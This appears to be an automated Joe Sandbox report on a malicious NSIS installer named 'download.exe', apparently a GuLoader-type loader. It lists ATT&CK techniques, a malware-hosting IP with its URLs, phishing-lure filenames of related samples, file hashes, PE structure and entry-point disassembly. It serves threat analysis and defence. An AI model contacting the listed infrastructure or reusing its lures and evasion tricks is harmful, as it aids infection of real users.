          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004031E9
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 111 Process Injection | 11 Virtualization/Sandbox Evasion | LSASS Memory | 11 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 111 Process Injection | NTDS | 3 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 DLL Side-Loading | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dll | 0% | ReversingLabs | |
          Source | Detection | Scanner | Label | Link | Download
          2.2.download.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | | Download File
          2.0.download.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | | Download File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://37.139.128.83/2-2100%Avira URL Cloudmalware
          http://37.139.128.83/2k100%Avira URL Cloudmalware
          http://37.139.128.83/2100%Avira URL Cloudmalware
          http://37.139.128.83/2Data100%Avira URL Cloudmalware
          http://37.139.128.83/2M100%Avira URL Cloudmalware
          http://37.139.128.83/2W7100%Avira URL Cloudmalware
          http://37.139.128.83/2R2100%Avira URL Cloudmalware
          http://37.139.128.83/2e100%Avira URL Cloudmalware
          http://37.139.128.83/l100%Avira URL Cloudmalware
          http://www.avast.com0/0%Avira URL Cloudsafe
          http://37.139.128.83/2gsLMEM8100%Avira URL Cloudmalware
          http://37.139.128.83/2$2100%Avira URL Cloudmalware
          http://37.139.128.83/262hk100%Avira URL Cloudmalware
          No contacted domains info
          Name | Malicious | Antivirus Detection | Reputation
          http://37.139.128.83/2 | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://37.139.128.83/2-2 | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://nsis.sf.net/NSIS_Error | download.exe | false | | high
http://37.139.128.83/2M | CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2Data | CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2k | CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2R2 | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2W7 | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2e | CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.avast.com0/ | lang-1032.dll.2.dr | false | Avira URL Cloud: safe | unknown
http://37.139.128.83/l | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://nsis.sf.net/NSIS_ErrorError | download.exe | false | | high
http://37.139.128.83/2gsLMEM8 | CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2$2 | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/262hk | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
37.139.128.83 | unknown | Germany | | 10753 | LVLT-10753US | false
              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:830512
              Start date and time:2023-03-20 13:11:48 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 17m 48s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:download.exe
              Detection:MAL
              Classification:mal76.troj.evad.winEXE@4/5@0/1
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:
              • Successful, ratio: 21.3% (good quality ratio 20.9%)
              • Quality average: 88.9%
              • Quality standard deviation: 21.4%
              HCA Information:
              • Successful, ratio: 78%
              • Number of executed functions: 57
              • Number of non-executed functions: 82
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, fs.microsoft.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com
• Execution Graph export aborted for target CasPol.exe, PID 924 because there are no executed functions
• Not all processes were analyzed; report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37.139.128.83 | New_Section_1.one | Get hash | malicious | AgentTesla | Browse | 37.139.128.83/golden.pdf
 | new.one | Get hash | malicious | Snake Keylogger | Browse | 37.139.128.83/golden.pdf
 | black.scr.exe | Get hash | malicious | GuLoader | Browse | 37.139.128.83/black/black.qxd
 | drawings and specifications.ppa | Get hash | malicious | GuLoader | Browse | 37.139.128.83/black/fejlnormerne.pif
              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
LVLT-10753US | setup.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
 | setup.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
 | setup.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
 | setup.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
 | setup.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
 | setup.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
 | setup.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
 | setup.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
 | BBVA_REMI_ADVICE_---------------PDF.exe | Get hash | malicious | Lokibot | Browse | 185.246.220.85
 | J3H3xpPLuS.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
 | NEW_ORDER_IMP.xls | Get hash | malicious | Lokibot | Browse | 185.246.220.60
 | NEW_ORDER_IMPO.xls | Get hash | malicious | Lokibot | Browse | 185.246.220.60
 | https://login-applepay.com | Get hash | malicious | Unknown | Browse | 45.88.67.56
 | F4cejyW26j.exe | Get hash | malicious | Cryptbot | Browse | 185.246.220.246
 | XFpT88EX6m.exe | Get hash | malicious | RHADAMANTHYS | Browse | 185.246.220.89
 | bWi6vHfild.exe | Get hash | malicious | Cryptbot | Browse | 185.246.220.246
 | hMD6Q7iUUh.exe | Get hash | malicious | Cryptbot | Browse | 185.246.220.246
 | QJyXW3rBrQ.elf | Get hash | malicious | Mirai | Browse | 148.57.27.122
 | installer.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
 | Bi72BqnFQ5.exe | Get hash | malicious | SmokeLoader | Browse | 185.246.221.154
              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll | 5Ieb5xJWO6.exe | Get hash | malicious | Nanocore, GuLoader | Browse |
 | xfsmHEylH8.exe | Get hash | malicious | GuLoader | Browse |
 | 5Ieb5xJWO6.exe | Get hash | malicious | Unknown | Browse |
 | xfsmHEylH8.exe | Get hash | malicious | GuLoader | Browse |
 | RACE ENGINEERING SDN BHD 0203_Pdf.exe | Get hash | malicious | GuLoader, Remcos | Browse |
 | RACE ENGINEERING SDN BHD 0203_Pdf.exe | Get hash | malicious | GuLoader | Browse |
 | FV-083471-23-02-22-269407#U00b7pdf.exe | Get hash | malicious | AveMaria, GuLoader, UACMe | Browse |
 | FV-083471-23-02-22-269407#U00b7pdf.exe | Get hash | malicious | GuLoader | Browse |
 | IT01879020517_uGIim-xml-p7m#U00b7pdf.exe | Get hash | malicious | NanoCore, GuLoader | Browse |
 | IT01879020517_uGIim-xml-p7m#U00b7pdf.exe | Get hash | malicious | GuLoader | Browse |
 | request for quote (Iberia Express Aircraft) 15-02-2023#U00b7pdf.exe | Get hash | malicious | AveMaria, GuLoader, UACMe | Browse |
 | request for quote (Iberia Express Aircraft) 15-02-2023#U00b7pdf.exe | Get hash | malicious | GuLoader | Browse |
 | file.exe | Get hash | malicious | GuLoader, Remcos | Browse |
 | file.exe | Get hash | malicious | GuLoader | Browse |
 | Invitation to Bid Quotation 15-02-2023#U00b7pdf.ex.exe | Get hash | malicious | AveMaria, GuLoader, UACMe | Browse |
 | Invitation to Bid Quotation 15-02-2023#U00b7pdf.ex.exe | Get hash | malicious | GuLoader | Browse |
 | TNOR_CYCLE_C2_220006954787_32106010359796_E_BDA_0_E_20221211_112633#U00b7pdf.exe | Get hash | malicious | NanoCore, GuLoader | Browse |
 | TNOR_CYCLE_C2_220006954787_32106010359796_E_BDA_0_E_20221211_112633#U00b7pdf.exe | Get hash | malicious | Unknown | Browse |
 | black.scr.exe | Get hash | malicious | GuLoader | Browse |
                                                    Process:C:\Users\user\Desktop\download.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):11776
                                                    Entropy (8bit):5.825582780706362
                                                    Encrypted:false
                                                    SSDEEP:192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
                                                    MD5:FBE295E5A1ACFBD0A6271898F885FE6A
                                                    SHA1:D6D205922E61635472EFB13C2BB92C9AC6CB96DA
                                                    SHA-256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
                                                    SHA-512:2CB596971E504EAF1CE8E3F09719EBFB3F6234CEA5CA7B0D33EC7500832FF4B97EC2BBE15A1FBF7E6A5B02C59DB824092B9562CD8991F4D027FEAB6FD3177B06
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: 5Ieb5xJWO6.exe, Detection: malicious, Browse
                                                    • Filename: xfsmHEylH8.exe, Detection: malicious, Browse
                                                    • Filename: 5Ieb5xJWO6.exe, Detection: malicious, Browse
                                                    • Filename: xfsmHEylH8.exe, Detection: malicious, Browse
                                                    • Filename: RACE ENGINEERING SDN BHD 0203_Pdf.exe, Detection: malicious, Browse
                                                    • Filename: RACE ENGINEERING SDN BHD 0203_Pdf.exe, Detection: malicious, Browse
                                                    • Filename: FV-083471-23-02-22-269407#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: FV-083471-23-02-22-269407#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: IT01879020517_uGIim-xml-p7m#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: IT01879020517_uGIim-xml-p7m#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: request for quote (Iberia Express Aircraft) 15-02-2023#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: request for quote (Iberia Express Aircraft) 15-02-2023#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: Invitation to Bid Quotation 15-02-2023#U00b7pdf.ex.exe, Detection: malicious, Browse
                                                    • Filename: Invitation to Bid Quotation 15-02-2023#U00b7pdf.ex.exe, Detection: malicious, Browse
                                                    • Filename: TNOR_CYCLE_C2_220006954787_32106010359796_E_BDA_0_E_20221211_112633#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: TNOR_CYCLE_C2_220006954787_32106010359796_E_BDA_0_E_20221211_112633#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: black.scr.exe, Detection: malicious, Browse
                                                    Reputation:moderate, very likely benign file
                                                    Process:C:\Users\user\Desktop\download.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):310762
                                                    Entropy (8bit):7.153872132508062
                                                    Encrypted:false
                                                    SSDEEP:6144:gjumg/DuSWsGx6RZLOMqkcjpwn2+3VJInGwhTFLI:gjumgbhWsGWZ+kcj2n2OJInJhTS
                                                    MD5:A1C8FEE704DB305175D7A96481B66C73
                                                    SHA1:F26BE75182187BB5AA73C170605CF171D62DC023
                                                    SHA-256:004CC2CA7789AB32D71678F5174DFC0F8EF1BA70A457929037E8CE0E4FD625C2
                                                    SHA-512:4F5865B975DDD54A7770D89A28ADD620C5A675225F8F7974E68A6173B33C6FCA853D98AD1E2B054147B2ACD6C810BF90A252C30034973AB08B9CBACD69E6B965
                                                    Malicious:false
                                                    Reputation:low
                                                    Process:C:\Users\user\Desktop\download.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):142071
                                                    Entropy (8bit):7.998708530523099
                                                    Encrypted:true
                                                    SSDEEP:3072:NZcIfJJvbMxWCmEblH1ZC0+UM53+9I1dPg4kh89+08iFRbleoK:5DMxW4fz1e3+9Sg9Z1iFRleoK
                                                    MD5:2CB77C7D9E16C0EF410FA8BC1CC1185A
                                                    SHA1:0FCBA04A0B4B4563D62A073080E173590BEEBEDD
                                                    SHA-256:A0BFB53FAD74C41F699F171902C1D6A0AC33A81963697A3F674234B2FF36203A
                                                    SHA-512:33FDB3488F9BF085D7CDA649984BAE271194ECB64B569B5BDB1D09DE48C5D5407D75CDC2EA1A59E8E199F821CE4DA5F101D0A7CAA44E544E78C8D8507B6BC751
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\download.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):178696
                                                    Entropy (8bit):4.4006904456537335
                                                    Encrypted:false
                                                    SSDEEP:3072:A8kCKqgt37ZJvMQSOnMIomX6YZVG5dWCR7+nyadqLEzBUyQj2UGBOyj:CvM7yj
                                                    MD5:8AD3A9D8C3DDA9854C13D213D00A8DB8
                                                    SHA1:74283E98F0426DFA7854CEEF9BA43217F39DAB36
                                                    SHA-256:DA07C1D13136E3BAABB9D0598AF99BCB48898BF5DBCA0F0477602BEA957198E9
                                                    SHA-512:C30CA6FA4A62A6383C15AB8B95CD88714AF5C3A63F7FC9C8F767FED18E295B885B765B630831F456D16DB5DA7AA037CA931FCB3F412AB95A8D5E46B1B44497CA
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Process:C:\Users\user\Desktop\download.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):291
                                                    Entropy (8bit):6.913400639640828
                                                    Encrypted:false
                                                    SSDEEP:6:6v/lhPysSFX/Fd8cy2TY3594VW6yTpm/v4pRw+jGbcnFbp:6v/7yFvn8cGJkv3twD
                                                    MD5:303E1921A67BAE379BC4B36352F391AA
                                                    SHA1:AB361F32C8F1811EC7DB6EB96DAD417753323DB4
                                                    SHA-256:1FC1141E644151384931853426BD36B5293BCAFE380189515850B9CC8FF158D7
                                                    SHA-512:0A355819B8EB530A30710D536CCF6F5AACA7E9050C7CA9F591E31DC8BCBCEFC83EC9EA5B1E3B9356D64A66B42D04A0DD504A97B7AFC6CA35E7CED23A82A74C93
                                                    Malicious:false
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.546765550553085
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:download.exe
                                                    File size:680560
                                                    MD5:064fa36da0c2ca360b0906cc5bfe67c6
                                                    SHA1:a6623c33cbd86bdaee063f897bea1692621494e5
                                                    SHA256:6974c5051372213d0e90147660c4b21bfff238e20c6449acb19f1901bf4729c8
                                                    SHA512:39845a084b66442a1eb114621df67fe6db88e758b4564b79c01eff6a1935dcaba4149f0d3c68e243258b7da5f3ce197a904e226f561a0dfc1377ff22419a6026
                                                    SSDEEP:12288:Z4oLK6+zAX00AF1pOSJe3xbIvli343lKZwIcBRPgYxFz18+t9Z1kU:6PQ00AF1pOSJeBUyqKKrf318U9Z1z
                                                    TLSH:F2E4F15A2B7AC815D065E9F85AE3C50D5C749E14183CABD25BB1283EEBFC2527B0F047
                                                    Icon Hash:c4ccc6e6e4f6f640
                                                    Entrypoint:0x4031e9
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x5C157F01 [Sat Dec 15 22:24:01 2018 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                                                    Signature Valid:false
                                                    Signature Issuer:CN=barket, OU="Biselg Halo Uvitinic ", E=Strammende@Kummerfuld.Kur, O=barket, L=Middleton, S=Tennessee, C=US
                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                    Error Number:-2146762487
                                                    Not Before, Not After
                                                    • 24/01/2023 23:36:10 23/01/2026 23:36:10
                                                    Subject Chain
                                                    • CN=barket, OU="Biselg Halo Uvitinic ", E=Strammende@Kummerfuld.Kur, O=barket, L=Middleton, S=Tennessee, C=US
                                                    Version:3
                                                    Thumbprint MD5:F856691DCF4BB6A788E55B70FE388011
                                                    Thumbprint SHA-1:0C5E3286DBBB50FA720930F437DDBC472FF1EFDF
                                                    Thumbprint SHA-256:7BCC618A115B3494BA1A7F1A5EDFACF31559C85478D2F90A7916E2A476BCF411
                                                    Serial:807C3D2B116DDE7C
                                                    Instruction
                                                    sub esp, 00000184h
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    xor ebx, ebx
                                                    push 00008001h
                                                    mov dword ptr [esp+18h], ebx
                                                    mov dword ptr [esp+10h], 0040A198h
                                                    mov dword ptr [esp+20h], ebx
                                                    mov byte ptr [esp+14h], 00000020h
                                                    call dword ptr [004080A0h]
                                                    call dword ptr [0040809Ch]
                                                    and eax, BFFFFFFFh
                                                    cmp ax, 00000006h
                                                    mov dword ptr [007A2F4Ch], eax
                                                    je 00007FBDE865E5C3h
                                                    push ebx
                                                    call 00007FBDE866169Ah
                                                    cmp eax, ebx
                                                    je 00007FBDE865E5B9h
                                                    push 00000C00h
                                                    call eax
                                                    mov esi, 00408298h
                                                    push esi
                                                    call 00007FBDE8661616h
                                                    push esi
                                                    call dword ptr [00408098h]
                                                    lea esi, dword ptr [esi+eax+01h]
                                                    cmp byte ptr [esi], bl
                                                    jne 00007FBDE865E59Dh
                                                    push 0000000Ah
                                                    call 00007FBDE866166Eh
                                                    push 00000008h
                                                    call 00007FBDE8661667h
                                                    push 00000006h
                                                    mov dword ptr [007A2F44h], eax
                                                    call 00007FBDE866165Bh
                                                    cmp eax, ebx
                                                    je 00007FBDE865E5C1h
                                                    push 0000001Eh
                                                    call eax
                                                    test eax, eax
                                                    je 00007FBDE865E5B9h
                                                    or byte ptr [007A2F4Fh], 00000040h
                                                    push ebp
                                                    call dword ptr [00408044h]
                                                    push ebx
                                                    call dword ptr [00408288h]
                                                    mov dword ptr [007A3018h], eax
                                                    push ebx
                                                    lea eax, dword ptr [esp+38h]
                                                    push 00000160h
                                                    push eax
                                                    push ebx
                                                    push 0079E500h
                                                    call dword ptr [00408178h]
                                                    push 0040A188h
                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8430 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c7000 | 0x37c28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa4d40 | 0x1530 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6068 | 0x6200 | False | 0.671875 | data | 6.450713900012796 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1250 | 0x1400 | False | 0.430078125 | data | 5.041636133183931 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x399058 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a4000 | 0x23000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c7000 | 0x37c28 | 0x37e00 | False | 0.4934109340044743 | data | 6.083319493650987 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3c7460 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States
RT_ICON | 0x3d7c88 | 0xd177 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x3e4e00 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States
RT_ICON | 0x3ee2a8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States
RT_ICON | 0x3f3730 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States
RT_ICON | 0x3f7958 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x3f9f00 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x3fafa8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
RT_ICON | 0x3fbe50 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x3fc7d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
RT_ICON | 0x3fd080 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0x3fd6e8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
RT_ICON | 0x3fdc50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_ICON | 0x3fe0b8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x3fe3a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_DIALOG | 0x3fe4c8 | 0x100 | data | English | United States
RT_DIALOG | 0x3fe5c8 | 0x11c | data | English | United States
RT_DIALOG | 0x3fe6e8 | 0xc4 | data | English | United States
RT_DIALOG | 0x3fe7b0 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3fe810 | 0xd8 | data | English | United States
RT_MANIFEST | 0x3fe8e8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
DLL | Import
KERNEL32.dll | GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
